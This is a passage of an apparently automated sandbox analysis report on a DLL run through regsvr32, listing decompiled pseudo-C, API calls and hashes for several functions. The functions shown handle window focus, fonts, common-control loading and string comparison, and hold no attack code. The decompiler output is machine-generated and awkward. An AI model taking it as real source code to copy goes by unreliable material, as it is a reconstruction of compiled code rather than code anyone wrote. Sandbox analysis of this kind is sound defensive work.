                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Classlstrlen$H_prologInfoRegister
                                                                        • String ID:
                                                                        • API String ID: 3690589370-0
                                                                        • Opcode ID: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                        • Instruction ID: 82e8c60a7f039037d0512a7f8540e8a50fdd43c9c42e3a44aee07f30fd402b66
                                                                        • Opcode Fuzzy Hash: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                        • Instruction Fuzzy Hash: 6B31AE75904219AFDB12DFA0CD85BADBFB9FF04355F104516F805A6162C734AA10CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10023123 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;
				void* _t44;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E10023092(__ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E1002040A(_t41);
						L11:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L12;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x1c);
							_v8 = GetFocus();
							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}
















                                                                        0x10023123
                                                                        0x10023126
                                                                        0x10023129
                                                                        0x1002312b
                                                                        0x10023133
                                                                        0x10023139
                                                                        0x1002313d
                                                                        0x10023142
                                                                        0x100231c9
                                                                        0x100231ce
                                                                        0x100231dd
                                                                        0x100231dd
                                                                        0x00000000
                                                                        0x100231d4
                                                                        0x100231d6
                                                                        0x100231c4
                                                                        0x100231c6
                                                                        0x100231df
                                                                        0x100231e2
                                                                        0x100231e2
                                                                        0x100231ce
                                                                        0x10023148
                                                                        0x1002314b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002314d
                                                                        0x10023150
                                                                        0x10023163
                                                                        0x1002316d
                                                                        0x1002316f
                                                                        0x10023170
                                                                        0x10023182
                                                                        0x10023188
                                                                        0x1002319b
                                                                        0x100231ac
                                                                        0x100231af
                                                                        0x100231af
                                                                        0x100231b9
                                                                        0x100231be
                                                                        0x100231be
                                                                        0x100231b9
                                                                        0x1002316d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ActiveFocus$MessageSend
                                                                        • String ID: u
                                                                        • API String ID: 1556911595-4067256894
                                                                        • Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                        • Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
                                                                        • Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                        • Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024970 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x1004c470; // 0x303bb91f
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}












                                                                        0x10024976
                                                                        0x1002497d
                                                                        0x10024986
                                                                        0x10024989
                                                                        0x1002498c
                                                                        0x1002498f
                                                                        0x10024994
                                                                        0x10024998
                                                                        0x100249a2
                                                                        0x100249b1
                                                                        0x100249b5
                                                                        0x100249c2
                                                                        0x100249c4
                                                                        0x100249c6
                                                                        0x100249c6
                                                                        0x100249e1
                                                                        0x100249e3
                                                                        0x100249e3
                                                                        0x100249e9
                                                                        0x100249ee
                                                                        0x100249f0
                                                                        0x100249f0
                                                                        0x10024a0b
                                                                        0x10024a0b
                                                                        0x1002499c
                                                                        0x100249a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetStockObject.GDI32(00000011), ref: 10024994
                                                                        • GetStockObject.GDI32(0000000D), ref: 1002499C
                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
                                                                        • GetDC.USER32(00000000), ref: 100249B8
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
                                                                        • ReleaseDC.USER32 ref: 100249E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                        • String ID: System
                                                                        • API String ID: 46613423-3470857405
                                                                        • Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                        • Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
                                                                        • Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                        • Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002155E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 40%
                                                                        			E1002155E(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}









                                                                        0x10021561
                                                                        0x1002156e
                                                                        0x10021570
                                                                        0x10021576
                                                                        0x1002157a
                                                                        0x100215d3
                                                                        0x1002157c
                                                                        0x10021582
                                                                        0x10021584
                                                                        0x1002158c
                                                                        0x100215a9
                                                                        0x100215b1
                                                                        0x100215b5
                                                                        0x100215b9
                                                                        0x100215bb
                                                                        0x100215c1
                                                                        0x100215c1
                                                                        0x100215b9
                                                                        0x1002158e
                                                                        0x1002159d
                                                                        0x1002159f
                                                                        0x100215a5
                                                                        0x100215a5
                                                                        0x1002159d
                                                                        0x100215c8
                                                                        0x00000000
                                                                        0x100215ce

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
                                                                        • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
                                                                        • #17.COMCTL32 ref: 1002159F
                                                                        • #17.COMCTL32 ref: 100215BB
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 100215C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                        • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                        • API String ID: 1437655972-4218389149
                                                                        • Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                        • Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
                                                                        • Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                        • Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001C425 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				int _t165;
				void* _t166;
				void* _t167;
				short* _t168;
				void* _t173;

				_push(0x40);
				_push(0x10042fa0);
				E10012514(__ebx, __edi, __esi);
				_t94 =  *0x1004c470; // 0x303bb91f
				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
				_t162 = 0;
				_t165 = 1;
				_t173 =  *0x1004f8b0 - _t162; // 0x0
				if(_t173 == 0) {
					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x1004f8b0 = 2;
						}
					} else {
						 *0x1004f8b0 = 1;
					}
				}
				if( *(_t167 + 0x14) > _t162) {
					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
				}
				_t95 =  *(_t167 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E1001C409( *(_t167 + 0x18), _t95);
					 *(_t167 + 0x1c) = _t95;
				}
				_t144 =  *0x1004f8b0; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t167 - 0x38) = _t162;
					__eflags =  *(_t167 + 8) - _t162;
					if( *(_t167 + 8) == _t162) {
						_t109 =  *0x1004f724; // 0x0
						 *(_t167 + 8) = _t109;
					}
					_t142 =  *(_t167 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x1004f734; // 0x0
					}
					_t166 = E1001A444(_t142,  *(_t167 + 8));
					__eflags = _t166 - 0xffffffff;
					if(_t166 != 0xffffffff) {
						__eflags = _t166 - _t142;
						if(__eflags == 0) {
							L67:
							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
							__eflags = _t162;
							if(__eflags != 0) {
								_push(_t162);
								E100107C8(_t142, _t162, _t165, __eflags);
								_push( *(_t167 - 0x38));
								E100107C8(_t142, _t162, _t165, __eflags);
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x14);
						_push( *(_t167 + 0x10));
						_push(_t166);
						_push(_t142);
						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x1c);
						_push( *(_t167 + 0x18));
						_push(_t166);
						_push(_t142);
						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
						 *(_t167 - 0x38) = _t106;
						__eflags = _t106;
						if(__eflags != 0) {
							 *(_t167 + 0x10) = _t162;
							 *(_t167 + 0x18) =  *(_t167 - 0x38);
							goto L67;
						}
						_push(_t162);
						E100107C8(_t142, _t162, _t166, __eflags);
					}
					goto L61;
				} else {
					if(_t144 != _t165) {
						L61:
						_t98 = 0;
						L70:
						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
					}
					 *(_t167 - 0x3c) = _t162;
					 *(_t167 - 0x44) = _t162;
					 *(_t167 - 0x40) = _t162;
					if( *(_t167 + 0x20) == _t162) {
						_t144 =  *0x1004f734; // 0x0
						 *(_t167 + 0x20) = _t144;
					}
					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t167 + 0x14) != _t95) {
							__eflags = _t95 - _t165;
							if(_t95 > _t165) {
								L69:
								_t98 = _t165;
								goto L70;
							}
							__eflags =  *(_t167 + 0x14) - _t165;
							if( *(_t167 + 0x14) <= _t165) {
								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t167 + 0x14) - _t162;
								if( *(_t167 + 0x14) <= _t162) {
									__eflags =  *(_t167 + 0x1c) - _t162;
									if( *(_t167 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t167 - 0x30) - _t141;
									if( *(_t167 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t167 - 0x2a;
									__eflags =  *((char*)(_t167 - 0x2a));
									if( *((char*)(_t167 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t167 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t167 - 0x30) - _t141;
								if( *(_t167 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t167 - 0x2a;
								__eflags =  *((char*)(_t167 - 0x2a));
								if( *((char*)(_t167 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t167 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
						 *(_t167 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t167 - 4) = _t162;
						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t167 - 0x18) = _t168;
						 *(_t167 - 0x34) = _t168;
						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
						_t118 =  *(_t167 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t167 - 0x3c);
								if(__eflags != 0) {
									_push( *(_t167 - 0x34));
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								_t98 =  *(_t167 - 0x40);
								goto L70;
							}
							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
							 *(_t167 - 0x4c) = _t165;
							__eflags = _t165;
							if(_t165 == 0) {
								goto L53;
							}
							 *(_t167 - 4) = 1;
							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t167 - 0x18) = _t168;
							_t162 = _t168;
							 *(_t167 - 0x50) = _t162;
							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
							__eflags = _t162;
							if(_t162 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
								}
								__eflags =  *(_t167 - 0x44);
								if(__eflags != 0) {
									_push(_t162);
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								goto L53;
							} else {
								_t162 = E100107B6(_t165 + _t165);
								__eflags = _t162;
								if(_t162 == 0) {
									goto L53;
								}
								 *(_t167 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E100107B6(_t143 + _t143);
							_pop(_t144);
							 *(_t167 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t167 - 0x3c) = _t165;
							goto L43;
						}
					}
				}
			}





























                                                                        0x1001c425
                                                                        0x1001c427
                                                                        0x1001c42c
                                                                        0x1001c431
                                                                        0x1001c436
                                                                        0x1001c439
                                                                        0x1001c43d
                                                                        0x1001c43e
                                                                        0x1001c444
                                                                        0x1001c459
                                                                        0x1001c463
                                                                        0x1001c469
                                                                        0x1001c46c
                                                                        0x1001c46e
                                                                        0x1001c46e
                                                                        0x1001c45b
                                                                        0x1001c45b
                                                                        0x1001c45b
                                                                        0x1001c459
                                                                        0x1001c47b
                                                                        0x1001c489
                                                                        0x1001c489
                                                                        0x1001c48c
                                                                        0x1001c491
                                                                        0x1001c497
                                                                        0x1001c49d
                                                                        0x1001c49d
                                                                        0x1001c4a0
                                                                        0x1001c4a8
                                                                        0x1001c4ab
                                                                        0x1001c6ea
                                                                        0x1001c6ed
                                                                        0x1001c6f0
                                                                        0x1001c6f2
                                                                        0x1001c6f7
                                                                        0x1001c6f7
                                                                        0x1001c6fa
                                                                        0x1001c6fd
                                                                        0x1001c6ff
                                                                        0x1001c701
                                                                        0x1001c701
                                                                        0x1001c710
                                                                        0x1001c712
                                                                        0x1001c715
                                                                        0x1001c71b
                                                                        0x1001c71d
                                                                        0x1001c768
                                                                        0x1001c780
                                                                        0x1001c782
                                                                        0x1001c784
                                                                        0x1001c786
                                                                        0x1001c787
                                                                        0x1001c78c
                                                                        0x1001c78f
                                                                        0x1001c795
                                                                        0x00000000
                                                                        0x1001c784
                                                                        0x1001c71f
                                                                        0x1001c721
                                                                        0x1001c726
                                                                        0x1001c727
                                                                        0x1001c72a
                                                                        0x1001c72b
                                                                        0x1001c734
                                                                        0x1001c736
                                                                        0x1001c738
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c73a
                                                                        0x1001c73c
                                                                        0x1001c741
                                                                        0x1001c742
                                                                        0x1001c745
                                                                        0x1001c746
                                                                        0x1001c747
                                                                        0x1001c74f
                                                                        0x1001c752
                                                                        0x1001c754
                                                                        0x1001c75f
                                                                        0x1001c765
                                                                        0x00000000
                                                                        0x1001c765
                                                                        0x1001c756
                                                                        0x1001c757
                                                                        0x1001c75c
                                                                        0x00000000
                                                                        0x1001c4b9
                                                                        0x1001c4bb
                                                                        0x1001c717
                                                                        0x1001c717
                                                                        0x1001c798
                                                                        0x1001c7a8
                                                                        0x1001c7a8
                                                                        0x1001c4c1
                                                                        0x1001c4c4
                                                                        0x1001c4c7
                                                                        0x1001c4cd
                                                                        0x1001c4cf
                                                                        0x1001c4d5
                                                                        0x1001c4d5
                                                                        0x1001c4db
                                                                        0x1001c4e8
                                                                        0x1001c4f1
                                                                        0x1001c4f3
                                                                        0x1001c796
                                                                        0x1001c796
                                                                        0x00000000
                                                                        0x1001c796
                                                                        0x1001c4f9
                                                                        0x1001c4fc
                                                                        0x1001c50d
                                                                        0x1001c513
                                                                        0x1001c515
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c51b
                                                                        0x1001c51e
                                                                        0x1001c54b
                                                                        0x1001c54e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c550
                                                                        0x1001c553
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c559
                                                                        0x1001c55c
                                                                        0x1001c560
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c566
                                                                        0x1001c566
                                                                        0x1001c566
                                                                        0x1001c569
                                                                        0x1001c56b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c574
                                                                        0x1001c576
                                                                        0x1001c578
                                                                        0x1001c582
                                                                        0x1001c582
                                                                        0x1001c584
                                                                        0x1001c587
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c589
                                                                        0x1001c57a
                                                                        0x1001c57c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c57c
                                                                        0x00000000
                                                                        0x1001c566
                                                                        0x1001c520
                                                                        0x1001c523
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c525
                                                                        0x1001c528
                                                                        0x1001c52c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c52e
                                                                        0x1001c52e
                                                                        0x1001c52e
                                                                        0x1001c531
                                                                        0x1001c533
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c538
                                                                        0x1001c53a
                                                                        0x1001c53c
                                                                        0x1001c542
                                                                        0x1001c542
                                                                        0x1001c544
                                                                        0x1001c547
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c549
                                                                        0x1001c53e
                                                                        0x1001c540
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c540
                                                                        0x1001c52e
                                                                        0x1001c4fe
                                                                        0x1001c500
                                                                        0x00000000
                                                                        0x1001c500
                                                                        0x1001c4ea
                                                                        0x1001c4ea
                                                                        0x00000000
                                                                        0x1001c58e
                                                                        0x1001c58e
                                                                        0x1001c5a1
                                                                        0x1001c5a3
                                                                        0x1001c5a6
                                                                        0x1001c5a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c5ae
                                                                        0x1001c5ba
                                                                        0x1001c5bf
                                                                        0x1001c5c4
                                                                        0x1001c5c7
                                                                        0x1001c5e9
                                                                        0x1001c5ec
                                                                        0x1001c5ee
                                                                        0x1001c608
                                                                        0x1001c614
                                                                        0x1001c61a
                                                                        0x1001c61c
                                                                        0x1001c6d3
                                                                        0x1001c6d3
                                                                        0x1001c6d7
                                                                        0x1001c6d9
                                                                        0x1001c6dc
                                                                        0x1001c6e1
                                                                        0x1001c6e2
                                                                        0x00000000
                                                                        0x1001c6e2
                                                                        0x1001c637
                                                                        0x1001c639
                                                                        0x1001c63c
                                                                        0x1001c63e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c644
                                                                        0x1001c654
                                                                        0x1001c659
                                                                        0x1001c65c
                                                                        0x1001c65e
                                                                        0x1001c661
                                                                        0x1001c67f
                                                                        0x1001c681
                                                                        0x1001c69a
                                                                        0x1001c6a7
                                                                        0x1001c6ad
                                                                        0x1001c6af
                                                                        0x1001c6c3
                                                                        0x1001c6c3
                                                                        0x1001c6c6
                                                                        0x1001c6ca
                                                                        0x1001c6cc
                                                                        0x1001c6cd
                                                                        0x1001c6d2
                                                                        0x00000000
                                                                        0x1001c683
                                                                        0x1001c68d
                                                                        0x1001c68f
                                                                        0x1001c691
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c693
                                                                        0x00000000
                                                                        0x1001c693
                                                                        0x1001c5f0
                                                                        0x1001c5f4
                                                                        0x1001c5f9
                                                                        0x1001c5fa
                                                                        0x1001c5fd
                                                                        0x1001c5ff
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c605
                                                                        0x00000000
                                                                        0x1001c605
                                                                        0x1001c5ee
                                                                        0x1001c4db

                                                                        APIs
                                                                        • CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
                                                                        • GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
                                                                        • GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
